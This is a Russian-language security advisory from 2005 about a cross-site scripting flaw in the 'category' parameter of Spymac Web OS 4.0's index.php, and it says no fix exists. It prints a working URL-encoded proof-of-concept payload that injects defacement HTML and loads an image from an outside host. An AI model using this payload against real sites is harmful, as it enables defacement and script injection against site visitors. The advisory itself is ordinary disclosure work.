Межсайтовый скриптинг в Spymac Web OS

Дата публикации:
13.09.2005
Всего просмотров:
1154
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Spymac Web OS 4.0

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует при обработке входных данных в параметре 'category' сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/index.php?category=1%22%3E%3C
body%3E%3Ch1%3ESe%20busca%20H4x 0r%3
C/h1%3E%3Cp%3E%20es%20peligroso
%20y%20va%20armado%3Cbr%3E%20Lleva%20
un%20portatil%20y%20un%20palm%20en%20las
%20manos%3Cbr%3E%20si%20le%20ven%20;
%20no%20le%20proporcionen%20conexion%20a
%20internet.%3C/p%3E%3Cp%3E%3C/p%3E3C
img20src=http://www.ttvn.com.vn/Uploaded/administrator/
hacker.jpg%3E%3Ch1%3EBy%20Lostmon%3C/h1%3E%3C/body%3E

URL производителей: arnieshwartz.spymac.com/the_spymac_web_os.htm

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Spymac Web OS 4.0 'category' variable Cross-site scripting

или введите имя

CAPTCHA